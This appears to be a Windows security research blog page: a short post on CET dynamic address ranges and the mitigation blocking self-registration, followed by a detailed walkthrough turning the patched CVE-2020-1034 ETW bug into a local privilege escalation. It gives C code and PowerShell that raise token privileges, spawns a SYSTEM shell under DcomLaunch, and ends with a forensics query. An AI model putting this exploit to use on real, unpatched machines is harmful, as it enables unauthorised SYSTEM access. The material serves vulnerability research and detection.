CET Updates – Dynamic Address Ranges

In the last post I covered one new addition to CET – relaxed mode. But as we saw, there were a few other interesting additions. One of them is CetDynamicApisOutOfProcOnly, which is the one I will be covering in this post and which was also backported to 20H1 and 20H2.

But before I explain the flag, let’s talk about the mechanism that it mitigates.

Dynamic Enforced Address Ranges

As we know, Microsoft’s implementation of hardware CET prevents a process from setting the instruction pointer to non-approved values through backward edge (“return”) flows, including through OS-provided mechanisms. Whether it’s by returning to an address that’s different from the one that’s in the shadow stack, or setting the thread context, or unwinding to an unexpected address during exception handling. But like we’ve seen in the last two posts, there are cases that require special handling. One of those is dynamically generated (JIT) code.

Such code doesn’t always follow the rules and assumptions of CET, so Microsoft added a way to handle its needs, similar to the handling of Dynamic Exception Handler Continuation Targets, which I talked about in the first post. In this solution, a process can declare some ranges as “CET compatible” such that setting the instruction pointer to any address within that range won’t trigger a CET exception (#CP) that will crash the process.

To keep those ranges, the EPROCESS received a new field:

typedef struct _EPROCESS
{
    ...
    /* 0x0b18 */ struct _RTL_AVL_TREE DynamicEHContinuationTargetsTree;
    /* 0x0b20 */ struct _EX_PUSH_LOCK DynamicEHContinuationTargetsLock;
    /* 0x0b28 */ struct _PS_DYNAMIC_ENFORCED_ADDRESS_RANGES DynamicEnforcedCetCompatibleRanges;
    /* 0x0b38 */ unsigned long DisabledComponentFlags;
    ...
} EPROCESS, *PEPROCESS;

This new PS_DYNAMIC_ENFORCED_ADDRESS_RANGES structure contains an RTL_AVL_TREE and an EX_PUSH_LOCK. New ranges are inserted into the tree through a call to NtSetInformationProcess with the new information class ProcessDynamicEnforcedCetCompatibleRanges (0x66). The caller supplies a pointer to a PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE_INFORMATION structure as the ProcessInformation argument, which contains the ranges to insert into the tree, or remove from it, depending on the Flags field:

typedef struct _PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE
{

    ULONG_PTR BaseAddress;
    SIZE_T Size;
    DWORD Flags;
PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE, *PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE;

typedef struct _PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION
{

    WORD NumberOfRanges;
    WORD Reserved;
    DWORD Reserved2;
    PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE Ranges;
PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION, *PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION;

The ranges are then read from the structure and inserted into the tree by the PspProcessDynamicEnforcedAddressRanges function. Of course, the process doesn’t have to call NtSetInformationProcess directly, as there is a wrapper function for this in the Win32 API exposed by KernelBase.dllSetProcessDynamicEnforcedCetCompatibleRanges:

BOOL
SetProcessDynamicEnforcedCetCompatibleRanges (
    _In_ HANDLE ProcessHandle,
    _In_ WORD NumberOfRanges,
    _In_ PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE Ranges
    )
{
    NTSTATUS status;
    PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION dynamicEnforcedAddressRanges;
    dynamicEnforcedAddressRanges.NumberOfRanges = NumberOfRanges;
    dynamicEnforcedAddressRanges.Ranges = Ranges;
    status = NtSetInformationProcess(ProcessHandle,
                                     ProcessDynamicEnforcedCetCompatibleRanges,
                                     &dynamicEnforcedAddressRanges,
                                     sizeof(PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION));
    if (NT_SUCCESS(status))
    {
        return TRUE;
    }
    BaseSetLastNTError(status);
    return FALSE;
}

This tree is used every time a CET fault happens – KiControlProtectionFaultShadow is invoked. It calls into KiControlProtectionFault, which calls KiProcessControlProtection. This function will look for the target address in the shadow stack and if it fails, will try the dynamic enforced CET compatible ranges through an exception handler.

First, the handler checks in strict CET is enabled in the system, to know whether it should check if the process has CET enabled (as a reminder, strict CET means that CET checks will be performed on all processes, regardless of how they were compiled). If strict mode is not enabled, the function will check the image headers for the CETCOMPAT flags and will skip the ranges check if the flag is not set.

If it was determined that CET should be enforced for the image, the function will call RtlFindDynamicEnforcedAddressInRanges to check if the target address is inside one dynamically enforced CET compatible address ranges. The function returns a BOOLEAN value to indicate whether a suitable range for the address was found or not. If a range was found, or if for some other reason the process should not be crashed (process is not CET compatible or audit mode is enabled), the function will then call KiFixupControlProtectionUserModeReturnMismatch to insert the target address into the shadow stack to allow the process to continue normal execution.

The Mitigation

Looking at all of this, an obvious flaw comes to mind. If a process can declare ranges that will be ignored by CET, all an exploit needs to do to bypass CET is manage to add a useful range in the process memory to the tree, and then ROP itself in the approved range.

This is why the CetDynamicApisOutOfProcOnly flag was added – it only allows a process to add dynamic CET compatible ranges for remote processes, and not for themselves. It does a very simple thing – inside NtSetInformationProcess, before calling PspProcessDynamicEnforcedAddressRanges, the function checks if CetDynamicApisOutOfProcOnly is set for the process and if the process is trying to add dynamic CET compatible ranges for itself. If so, the function will return STATUS_ACCESS_DENIED and the attempt will fail.

And actually in the newest builds of Windows, almost all Windows processes have this flag set by default. The only process that doesn’t appear to have it enabled is the Idle process (which doesn’t have a real EPROCESS structure, only a KPROCESS, so we’re effectively reading garbage memory).

Read our other blog posts:

Exploiting a “Simple” Vulnerability – In 35 Easy Steps or Less!

Introduction

In September MS issued a patch that fixed the CVE-2020-1034 vulnerability. This is a pretty cool and relatively simple vulnerability (increment by one), so I wanted to use it as a case study and look at a side of exploitation that isn’t talked about very often. Most public talks and blog posts related to vulnerabilities and exploits go into depth about the vulnerability itself, its discovery and research, and end with a PoC showing a successful “exploitation” – usually a BSOD with some kernel address being set to 0x41414141. This type of analysis is cute and splashy, but I wanted to look at the step after the crash – how to take a vulnerability and actually build a stable exploit around it, preferably one that isn’t detected easily?

This post will go into a bit more detail about the vulnerability itself, as when it’s been explained by others it was mainly with screenshots of assembly code, and data structures with magic numbers and uninitialized stack variables. Thanks to tools such as the public symbol files (PDB) from Microsoft, SDK header files, as well as Hex-rays Decompiler from IDA, a slightly easier to understand analysis can be made, revealing the actual underlying cause(s). Then, this post will focus on exploring the Windows mechanisms involved in the vulnerability and how they can be used to create a stable exploit that results in local privilege escalation without crashing the machine (which is what a naïve exploitation of this vulnerability will eventually result in, for reasons I’ll explain).

 

The Vulnerability

In short, CVE-2020-1034 is an input validation bug in EtwpNotifyGuid that allows an increment of an arbitrary address. The function doesn’t account for all possible values of a specific input parameter (ReplyRequested) and for values other than 0 and 1 will treat an address inside the input buffer as an object pointer and try to reference it, which will result in an increment at ObjectAddress - offsetof(OBJECT_HEADER, Body). The root cause is essentially a check that applies the BOOLEAN logic of “!= FALSE” in one case, while then using “== TRUE” in another. A value such as 2 incorrectly fails the second check, but still hits the first.

NtTraceControl receives an input buffer as its second parameter. In the case leading to this vulnerability, the buffer will begin with a structure of type ETWP_NOTIFICATION_HEADER. This input parameter is passed into EtwpNotifyGuid, where the following check happens:

If NotificationHeader->ReplyRequested is 1, the ReplyObject field of the structure will be populated with a new UmReplyObject. A little further down the function, the notification header, or actually a kernel copy of it, is passed to EtwpSendDataBlock and from there to EtwpQueueNotification, where we find the bug:

If NotificationHeader->ReplyRequested is not 0, ObReferenceObject is called, which is going to grab the OBJECT_HEADER that is found right before the object body and increment PointerCount by 1. Now we can see the problem – ReplyRequested is not a single bit that can be either 0 or 1. It’s a BOOLEAN, meaning it can be any value from 0 to 0xFF. And any non-zero value other than 1 will not leave the ReplyObject field untouched but will still call ObReferenceObject with whichever address the (user-mode) caller supplied for this field, leading to an increment of an arbitrary address. Since PointerCount is the first field in OBJECT_HEADER, this means that the address that will be incremented is the one in NotificationHeader->ReplyObject - offsetof(OBJECT_HEADER, Body).

The fix of this bug is probably obvious to anyone reading this and involved a very simple change in EtwpNotifyGuid:

if (notificationHeader->ReplyRequested != FALSE)
{
    status = EtwpCreateUmReplyObject((ULONG_PTR)etwGuidEntry,
                                     &Handle,
                                     &replyObject);
    if (NT_SUCCESS(status))
    {
        notificationHeader->ReplyObject = replyObject;
        goto alloacteDataBlock;
    }
}
else
{
    ...
}

Any non-zero value in ReplyRequested will lead to allocating a new reply object that will overwrite the value passed in by the caller.

On the surface this bug sounds very easy to exploit. But in reality, not so much. Especially if we want to make our exploit evasive and hard to detect. So, let’s begin our journey by looking at how this vulnerability is triggered and then try to exploit it.

How to Trigger

This vulnerability is triggered through NtTraceControl, which has this signature:

NTSTATUS
NTAPI
NtTraceControl (
    _In_ ULONG Operation,
    _In_ PVOID InputBuffer,
    _In_ ULONG InputSize,
    _In_ PVOID OutputBuffer,
    _In_ ULONG OutputSize,
    _Out_ PULONG BytesReturned
);

If we look at the code inside NtTraceControl we can learn a few things about the arguments we need to send to trigger the vulnerability:

The function has a switch statement for handling the Operation parameter – to reach EtwpNotifyGuid we need to use EtwSendDataBlock (17). We also see some requirements about the sizes we need to pass in, and we can also notice that the NotificationType we need to use should not be EtwNotificationTypeEnable as that will lead us to EtwpEnableGuid instead. There are a few more restrictions on the NotificationType field, but we’ll see those soon.

It’s worth noting that this code path is called by the Win32 exported function EtwSendNotification, which Geoff Chappel documented on his blog post. The information on Notify GUIDs is also valuable  where Geoff corroborates the parameter checks shown above.

Let’s look at the ETWP_NOTIFICATION_HEADER structure to see what other fields we need to consider here:

typedef struct _ETWP_NOTIFICATION_HEADER
{
    ETW_NOTIFICATION_TYPE NotificationType;
    ULONG NotificationSize;
    LONG RefCount;
    BOOLEAN ReplyRequested;
    union
    {
        ULONG ReplyIndex;
        ULONG Timeout;
    };
    union
    {
        ULONG ReplyCount;
        ULONG NotifyeeCount;
    };
    union
    {
        ULONGLONG ReplyHandle;
        PVOID ReplyObject;
        ULONG RegIndex;
    };
    ULONG TargetPID;
    ULONG SourcePID;
    GUID DestinationGuid;
    GUID SourceGuid;
} ETWP_NOTIFICATION_HEADER, *PETWP_NOTIFICATION_HEADER;

Some of these fields we’ve seen already and others we didn’t, and some of these don’t matter much for the purpose of our exploit. We’ll begin with the field that required the most work – DestinationGuid:

Finding the Right GUID

ETW is based on providers and consumers, where the providers notify about certain events and the consumers can choose to be notified by one or more providers. Each of the providers and consumers in the system is identified by a GUID.

Our vulnerability is in the ETW notification mechanism (which used to be WMI but now it is all part of ETW). When sending a notification, we are actually notifying a specific GUID, so we need to be careful to pick one that will work.

The first requirement is picking a GUID that actually exists on the system:

One of the first things that happens in EtwpNotifyGuid is a call to EtwpFindGuidEntryByGuid, with the DestinationGuid passed in, followed by an access check on the returned ETW_GUID_ENTRY.

What GUIDs are Registered?

To find a GUID that will successfully pass this code we should first go over a bit of ETW internals. The kernel has a global variable named PspHostSiloGlobals, which is a pointer to a ESERVERSILO_GLOBALS structure. This structure contains a EtwSiloState field, which is a ETW_SILODRIVERSTATE structure. This structure has lots of interesting information that is needed for ETW management, but the one field we need for our research is EtwpGuidHashTables. This is an array of 64 ETW_HASH_BUCKETS structures. To find the right bucket for a GUID it needs to be hashed this way: (Guid->Data1 ^ (Guid->Data2 ^ Guid->Data4[0] ^ Guid->Data4[4])) & 0x3F. This system was probably implemented as a performant way to find the kernel structures for GUIDs, since hashing the GUID is faster than iterating a list.

Each bucket contains a lock and 3 linked lists, corresponding to the 3 values of ETW_GUID_TYPE:

These lists contain structures of type ETW_GUID_ENTRY, which have all the needed information for each registered GUID:

As we can see in the screenshot earlier, EtwpNotifyGuid passes EtwNotificationGuid type as the ETW_GUID_TYPE (unless NotificationType is EtwNotificationTypePrivateLogger, but we will see later that we should not be using that). We can start by using some WinDbg magic to print all the ETW providers registered on my system under EtwNotificationGuidType and see which ones we can choose from:

When EtwpFindGuidEntryByGuid is called, it receives a pointer to the ETW_SILODRIVERSTATE, the GUID to search for and the ETW_GUID_TYPE that this GUID should belong to, and returns the ETW_GUID_ENTRY for this GUID. If a GUID is not found, it will return NULL and EtwpNotifyGuid will exit with STATUS_WMI_GUID_NOT_FOUND.

dx -r0 @$etwNotificationGuid = 1
dx -r0 @$GuidTable = ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpGuidHashTable
dx -g @$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid]).Where(list => list.Flink != &list).Select(list => (nt!_ETW_GUID_ENTRY*)(list.Flink)).Select(Entry => new { Guid = Entry->Guid, Refs = Entry->RefCount, SD = Entry->SecurityDescriptor, Reg = (nt!_ETW_REG_ENTRY*)Entry->RegListHead.Flink})

Only one active GUID is registered on my system! This GUID could be interesting to use for our exploit, but before we do, we should look at a few more details related to it.

In the diagram earlier we can see the RegListHead field inside the ETW_GUID_ENTRY. This is a linked list of ETW_REG_ENTRY structures, each describing a registered instance of the provider, since the same provider can be registered multiple times, by the same process or different ones. We’ll grab the “hash” of this GUID (25) and print some information from its RegList:

dx -r0 @$guidEntry = (nt!_ETW_GUID_ENTRY*)(@$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid])[25].Flink)
dx -g Debugger.Utility.Collections.FromListEntry(@$guidEntry->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Select(r => new {Caller = r.Caller, SessionId = r.SessionId, Process = r.Process, ProcessName = ((char[15])r.Process->ImageFileName)->ToDisplayString("s"), Callback = r.Callback, CallbackContext = r.CallbackContext})

There are 6 instances of this GUID being registered on this system by 6 different processes. This is cool but could make our exploit unstable – when a GUID is notified, all of its registered entries get notified and might try to handle the request. This causes two complications:

  1. We can’t predict accurately how many increments our exploit will cause for the target address, since we could get one increment for each registered instance (but not guaranteed to – this will be explained soon).
  2. Each of the processes that registered this provider could try to use our fake notification in a different way that we didn’t plan for. They could try to use the fake event, or read some data that isn’t formatted properly, and cause a crash. For example, if the notification has NotificationType = EtwNotificationTypeAudio, Audiodg.exe will try to process the message, which will make the kernel free the ReplyObject. Since the ReplyObject is not an actual object, this causes an immediate crash of the system. I didn’t test different cases, but it’s probably safe to assume that even with a different NotificationType this will still crash eventually as some registered process tries to handle the notification as a real one.

Since the goal we started with was creating a stable and reliable exploit that doesn’t randomly crash the system, it seems that this GUID is not the right one for us. But this is the only registered provider in the system, so what else are we supposed to use?

A Custom GUID

We can register our own provider! This way we are guaranteed that no one else is going to use it and we have full control over it. EtwNotificationRegister allows us to register a new provider with a GUID of our choice.

And again, I’ll save you the trouble of trying this out for yourself and tell you in advance that this just doesn’t work. But why?

Like everything on Windows, an ETW_GUID_ENTRY has a security descriptor, describing which actions different users and groups are allowed to perform on it. And as we saw in the screenshot earlier, before notifying a GUID EtwpNotifyGuid calls EtwpAccessCheck to check if the GUID has WMIGUID_NOTIFICATION access set for the user which is trying to notify it.

To test this, I registered a new provider, which we can see when we dump the registered providers the same way we did earlier:

And use the !sd command to print its security descriptor nicely (this is not the full list, but I trimmed it down to the relevant part):

A security descriptor is made up of groups (SID) and an ACCESS_MASK (ACL). Each group is represented by a SID, in the form of “S-1-...” and a mask describing the actions this group is allowed to perform on this object. Since we are running as a normal user with an integrity level of medium, we are usually pretty limited in what we can do. The main groups that our process is included in are Everyone (S-1-1-0) and Users (S-1-5-32-545). As we can see here, the default security descriptor for an ETW_GUID_ENTRY doesn’t contain any specific access mask for Users, and the access mask for Everyone is 0x1800 (TRACELOG_JOIN_GROUP | TRACELOG_REGISTER_GUIDS). Higher access masks are reserved for more privileges groups, such as Local System and Administrators. Since our user doesn’t have WMIGUID_NOTIFICATION privileges for this GUID, we will receive STATUS_ACCESS_DENIED when trying to notify it and our exploit will fail.

That is, unless you are running it on a machine that has Visual Studio installed. Then the default Security Descriptor changes and Performance Log Users (which are basically any logged in user) receive all sorts of interesting privileges, including the two we care about. But let’s pretend that your exploit is not running on a machine that has one of the most popular Windows tools installed on it and focus on clean Windows machines without weird permission bugs.

Well, not all GUIDs use the default security descriptor. It is possible to change the access rights for a GUID, through the registry key HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Security:

This key contains all the GUIDs in the system using non-default security descriptors. The data is the security descriptor for the GUID, but since it is shown here as a REG_BINARY it is a bit difficult to parse this way.

Ideally, we would just add our new GUID here and a more permitting configuration and go on to trigger the exploit. Unfortunately, letting any user change the security descriptor of a GUID will break the Windows security model, so access to this registry key is reserved for SYSTEM, Administrators and EventLog:

If our default security descriptor is not strong enough and we can’t change it without a more privileged process, it looks like we can’t actually achieve much using our own GUID.

Living Off the Land

Luckily, using the one registered GUID on the system and registering our own GUID are not the only available choices. There are a lot of other GUIDs in that registry key that already have modified permissions. At least one of them must allow WMIGUID_NOTIFICATION for a non-privileged user.

Here we face another issue – actually, in this case WMIGUID_NOTIFICATION is not enough. Since none of these GUIDs is a registered provider yet, we will first need to register them before being able to use them for our exploit. When registering a provider through EtwNotificationRegister, the request goes through NtTraceControl and reaches EtwpRegisterUMGuid, where this check is done:

To be able to use an existing GUID, we need it to allow both WMIGUID_NOTIFICATION and TRACELOG_REGISTER_GUIDS for a normal user. To find one we’ll use the magic of PowerShell, which manages to have such an ugly syntax that it almost made me give up and write a registry parser in C instead (if you didn’t notice the BOOLEAN AND so far, now you did. Yes, this is what it is. I’m sorry). We’ll iterate over all the GUIDs in the registry key and check the security descriptor for Everyone (S-1-1-0), and print the GUIDs that allow at least one of the permissions we need:

$RegPath = "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Security"
foreach($line in (Get-Item $RegPath).Property) { $mask = (New-Object System.Security.AccessControl.RawSecurityDescriptor ((Get-ItemProperty $RegPath | select -Expand $line), 0)).DiscretionaryAcl | where SecurityIdentifier -eq S-1-1-0 | select AccessMask; if ($mask -and [Int64]($mask.AccessMask) -band 0x804) { $line; $mask.AccessMask.ToString("X")}}

Not much luck here. Other than the GUID we already know about nothing allows both the permission we need to Everyone.

But I’m not giving up yet! Let’s try the script again, this time checking the permissions for Users (S-1-5-32-545):

foreach($line in Get-Content C:\Users\yshafir\Desktop\guids.txt) { $mask = (New-Object System.Security.AccessControl.RawSecurityDescriptor ((Get-ItemProperty $RegPath | select -Expand $line), 0)).DiscretionaryAcl | where SecurityIdentifier -eq S-1-5-32-545 | select AccessMask; if ($mask -and [Int64]($mask.AccessMask) -band 0x804) { $line; $mask.AccessMask.ToString("X")}}

Now this is much better! There are multiple GUIDs allowing both the things we need; we can choose any of them and finally write an exploit!

For my exploit I chose to use the second GUID in the screenshot – {4838fe4f-f71c-4e51-9ecc-8430a7ac4c6c} – belonging to “Kernel Idle State Change Event”. This was a pretty random choice and any of the other ones than enable both needed rights should work the same way.

What Do We Increment?

Now starts the easy part – we register our shiny new GUID, choose an address to increment, and trigger the exploit. But what address do we want to increment?

The easiest choice for privilege escalation is the token privileges:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->Privileges
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->Privileges                 [Type: _SEP_TOKEN_PRIVILEGES]    
[+0x000] Present          : 0x602880000 [Type: unsigned __int64]    
[+0x008] Enabled          : 0x800000 [Type: unsigned __int64]    
[+0x010] EnabledByDefault : 0x40800000 [Type: unsigned __int64]

When checking if a process or a thread can do a certain action in the system, the kernel checks the token privileges – both the Present and Enabled bits. That makes privilege escalation relatively easy in our case: if we want to give our process a certain useful privilege – for example SE_DEBUG_PRIVILEGE, which allows us to open a handle to any process in the system – we just need to increment the privileges of the process token until they contain the privilege we want to have.

There are a few simple steps to achieve that:

  1. Open a handle to the process token.
  2. Get the address of the token object in the kernel – Use NtQuerySystemInformation with SystemHandleInformation class to receive all the handles in the system and iterate them until we find the one matching our token and save the Object address.
  3. Calculate the address of Privileges.Present and Privileges.Enabled based on the offsets inside the token.
  4. Register a new provider with the GUID we found.
  5. Build the malicious ETWP_NOTIFICATION_HEADER structure and call NtTraceControl the correct number of times (0x100000 for SE_DEBUG_PRIVILEGE) to increment Privileges.Present, and again to increment Privileges.Enabled.

Like a lot of things, this sounds great until you actually try it. In reality, when you try this you will see that your privileges don’t get incremented by 0x100000. In fact, Present privileges only gets incremented by 4 and Enabled stays untouched. To understand why we need to go back to ETW internals…

Slots and Limits

Earlier we saw how the GUID entry is represented in the kernel and that each GUID can have multiple ETW_REG_ENTRY structures registered to it, representing each registration instance. When a GUID gets notified, the notification gets queues for all of its registration instances (since we want all processes to receive a notification). For that, the ETW_REG_ENTRY has a ReplyQueue, containing 4 ReplySlot entries. Each of these is pointing to an ETW_QUEUE_ENTRY structure, which contains the information needed to handle the request – the data block provided by the notifier, the reply object, flags, etc:

This is not relevant for this exploit, but the ETW_QUEUE_ENTRY also contains a linked list of all the queued notifications waiting for this process, from all GUIDs. Just mentioning it here because this could be a cool way to reach different GUIDs and processes and worth exploring 🙂

Since every ETW_REG_ENTRY only has 4 reply slots, it can only have 4 notifications waiting for a reply at any time. Any notification that arrives while the 4 slots are full will not be handled – EtwpQueueNotification will reference the “object” supplied in ReplyObject, only to immediately dereference it when it sees that the reply slots are full:

Usually this is not an issue since notifications get handled pretty quickly by the consumer waiting for them and get removed from the queue almost immediately. However, this is not the case for our notifications – we are using a GUID that no one else is using, so no one is waiting for these notifications. On top of that, we are sending “corrupted” notifications, which have the ReplyRequested field set to non-zero, but don’t have a valid ETW registration object set as their ReplyObject (since we are using an arbitrary pointer that we want to increment). Even if we reply to the notifications ourselves, the kernel will try to treat our ReplyObject as a valid ETW registration object, and that will most likely crash the system one way or another.

Sounds like we are blocked here — we can’t reply to our notifications and no one else will either, and that means we have no way to free the slots in the ETW_REG_ENTRY and are limited to 4 notifications. Since freeing the slots will probably result in crashing the system, it also means that our process can’t exit once it triggers the vulnerability – when a process exits all of its handles get closed and that will lead to freeing all the queued notifications.

Keeping our process alive is not much of an issue, but what can we do with only 4 increments?

The answer is, we don’t really need to limit ourselves to 4 increments and can actually use just one – if we use our knowledge of how ETW works.

Provider Registration to the Rescue

Now we know that every registered provider can only have up to 4 notifications waiting for a reply. The good news is that there is nothing stopping us from registering more than one provider, even for the same GUID. And since every notification gets queued for all registered instances for the GUID, we don’t even need to notify each instance separately – we can register X providers and only send one notification, and receive X increments for our target address! Or we can send 4 notifications and get 4X increments (for the same target address, or up to 4 different ones):

Knowing that, can we register 0x100000 providers, then notify them once with a “bad” ETW notification and get SE_DEBUG_PRIVILEGE in our token and finally have an exploit?

Not exactly.

When registering a provider using EtwNotificationRegister, the function first needs to allocate and initialize an internal registration data structure that will be sent to NtTraceControl to register the provider. This data structure is allocated with EtwpAllocateRegistration, where we see the following check:

Ntdll only allows the process to register up to 0x800 providers. If the current number of registered providers for the process is 0x800, the function will return and the operation will fail.

Of course, we can try to bypass this by figuring out the internal structures, allocating them ourselves and calling NtTraceControl directly. However, I wouldn’t recommend it — this is complicated work and might cause unexpected side effects when ntdll will try to handle a reply for providers that it doesn’t know of.

Instead, we can do something much simpler: we want to increment our privileges by 0x100000. But if we look at the privileges as separate bytes and not as a DWORD, we’ll see that actually, we only want to increment the 3rd byte by 0x10:

To make our exploit simpler and only require 0x10 increments, we will just add 2 bytes to our target addresses for both Privileges.Present and Privileges.Enabled. We can further minimize the amount of calls we need to make to NtTraceControl if we register 0x10 providers using the GUID we found, then send one notification with the address of Privileges.Present as a target, and another one with the address of Privileges.Enabled.

Now we only have one thing left to do before writing our exploit – building our malicious notification.

Notification Header Fields

ReplyRequested

As we’ve seen in the beginning of this post (so to anyone who made it this far, probably 34 days ago), the vulnerability is triggered through a call to NtTraceControl with an ETWP_NOTIFICATION_HEADER structure where ReplyRequested is a value other than 0 and 1. For this exploit I’ll use 2, but any other value between 2 and 0xFF will work.

NotificationType

Then we need to pick a notification type out of the ETW_NOTIFICATION_TYPE enum:

typedef enum _ETW_NOTIFICATION_TYPE
{
    EtwNotificationTypeNoReply = 1,
    EtwNotificationTypeLegacyEnable = 2,
    EtwNotificationTypeEnable = 3,
    EtwNotificationTypePrivateLogger = 4,
    EtwNotificationTypePerflib = 5,
    EtwNotificationTypeAudio = 6,
    EtwNotificationTypeSession = 7,
    EtwNotificationTypeReserved = 8,
    EtwNotificationTypeCredentialUI = 9,
    EtwNotificationTypeMax = 10,
} ETW_NOTIFICATION_TYPE;

We’ve seen earlier that our chosen type should not be EtwNotificationTypeEnable, since that will lead to a different code path that will not trigger our vulnerability.

We also shouldn’t use EtwNotificationTypePrivateLogger or EtwNotificationTypeFilteredPrivateLogger. Using these types changes the destination GUID to PrivateLoggerNotificationGuid and requires having access TRACELOG_GUID_ENABLE, which is not available for normal users. Other types, such as EtwNotificationTypeSession and EtwNotificationTypePerflib are used across the system and could lead to unexpected results if some system component tries to handle our notification as belonging to a known type, so we should probably avoid those too.

The two safest types to use are the last ones – EtwNotificationTypeReserved, which is not used by anything in the system that I could find, and EtwNotificationTypeCredentialUI, which is only used in notifications from consent.exe when it opens and closes the UAC popup, with no additional information sent (what is this notification good for? It’s unclear. And since there is no one listening for it I guess MS is not sure why it’s there either, or maybe they completely forgot it exists). For this exploit, I chose to use EtwNotificationTypeCredentialUI.

NotificationSize

As we’ve seen in NtTraceControl, the NotificationSize field has to be at least sizeof(ETWP_NOTIFICATION_HEADER). We have no need for any more than that, so we will make it this exact size.

ReplyObject

This will be the address that we want to increment + offsetof(OBJECT_HEADER, Body) – the object header contains the first 8 bytes of the object it in, so we shouldn’t include them in our calculation, or we’ll have an 8-byte offset. And to that we will add 2 more bytes to directly increment the third byte, which is the one we are interested in.

This is the only field we’ll need to change between our notifications – our first notification will increment Privileges.Present, and the second will increment Privileges.Enabled.

Other than DestinationGuid, which we already talked about a lot, the other fields don’t interest us and are not used in our code paths, so we can leave them at 0.

Building the Exploit

Now we have everything we need to try to trigger our exploit and get all those new privileges!

Registering Providers

First, we’ll register our 0x10 providers. This is pretty easy and there’s not much to explain here. For the registration to succeed we need to create a callback. This will be called whenever the provider is notified and can reply to the notification. I chose not to do anything in this callback, but it’s an interesting part of the mechanism that can be used to do some interesting things, such as using it as an injection technique.

But this blog post is already long enough so we will just define a minimal callback that does nothing:

ULONG
EtwNotificationCallback (
    _In_ ETW_NOTIFICATION_HEADER* NotificationHeader,
    _In_ PVOID Context
    )
{
    return 1;
}

And then register our 0x10 providers with the GUID we picked:

REGHANDLE regHandle;
for (int i = 0; i < 0x10; i++)
{
    result = EtwNotificationRegister(&EXPLOIT_GUID,
                                     EtwNotificationTypeCredentialUI,
                                     EtwNotificationCallback,
                                     NULL,
                                     &regHandle);
    if (!SUCCEEDED(result))
    {
        printf("Failed registering new provider\n");
        return 0;
    }
}

I’m reusing the same handle because I have no intention of closing these handles – closing them will lead to freeing the used slots, and we’ve already determined that this will lead to a system crash.

The Notification Header

After all this work, we finally have our providers and all the notification fields that we need, we can build our notification header and trigger the exploit! Earlier I explained how to get the address of our token and it mostly just involves a lot of code, so I won’t show it here again, let’s assume that getting the token was successful and we have its address.

First, we calculate the 2 addresses we will want to increment:

presentPrivilegesAddress = (PVOID)((ULONG_PTR)tokenAddress +
                           offsetof(TOKEN, Privileges.Present) + 2);
enabledPrivilegesAddress = (PVOID)((ULONG_PTR)tokenAddress +
                           offsetof(TOKEN, Privileges.Enabled) + 2);

Then we will define our data block and zero it:

ETWP_NOTIFICATION_HEADER dataBlock;
RtlZeroMemory(&dataBlock, sizeof(dataBlock));

And populate all the needed fields:

dataBlock.NotificationType = EtwNotificationTypeCredentialUI;
dataBlock.ReplyRequested = 2;
dataBlock.NotificationSize = sizeof(dataBlock);
dataBlock.ReplyObject = (PVOID)((ULONG_PTR)(presentPrivilegesAddress) +
                        offsetof(OBJECT_HEADER, Body));
dataBlock.DestinationGuid = EXPLOIT_GUID;

And finally, call NtTraceControl with our notification header (we could have passed dataBlock as the output buffer too, but I decided to define a new ETWP_NOTIFICATION_HEADER and use that for clarify):

status = NtTraceControl(EtwSendDataBlock,
                        &dataBlock,
                        sizeof(dataBlock),
                        &outputBuffer,
                        sizeof(outputBuffer),
                        &returnLength);

We will then repopulate the fields with the same values, set ReplyObject to (PVOID)((ULONG_PTR)(enabledPrivilegesAddress) + offsetof(OBJECT_HEADER, Body)) and call NtTraceControl again to increment our Enabled privileges.

Then we look at our token:

And we have SeDebugPrivilege!

Now what do we do with it?

Using SeDebugPrivilege

Once you have SeDebugPrivilege you have access to any process in the system. This gives you plenty of different ways to run code as SYSTEM, such as injecting code to a system process.

I chose to use the technique that Alex and I demonstrated in faxhell – Creating a new process and reparenting it to have a non-suspicious system-level parent, which will make the new process run as SYSTEM. As a parent I chose to use the same one that we did in Faxhell – the DcomLaunch service.

The full explanation of this technique can be found in the blog post about faxhell, so I will just briefly explain the steps:

  1. Use the exploit to receive SeDebugPrivilege.
  2. Open the DcomLaunch service, query it to receive the PID and open the process with PROCESS_ALL_ACCESS.
  3. Initialize process attributes and pass in the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute and the handle to DcomLaunch to set it as the parent.
  4. Create a new process using these attributes.

I implemented all those steps and…

Got a cmd process running as SYSTEM under DcomLaunch!

Forensics

Since this exploitation method leaves queued notifications that will never get removed, it’s relatively easy to find in memory – if you know where to look.

We go back to our WinDbg command from earlier and parse the GUID table. This time we also add the header to the ETW_REG_ENTRY list, and the number of items on the list:

dx -r0 @$GuidTable = ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpGuidHashTable
dx -g @$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid]).Where(list => list.Flink != &list).Select(list => (nt!_ETW_GUID_ENTRY*)(list.Flink)).Select(Entry => new { Guid = Entry->Guid, Refs = Entry->RefCount, SD = Entry->SecurityDescriptor, Reg = (nt!_ETW_REG_ENTRY*)Entry->RegListHead.Flink, RegCount = Debugger.Utility.Collections.FromListEntry(Entry->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Count()})

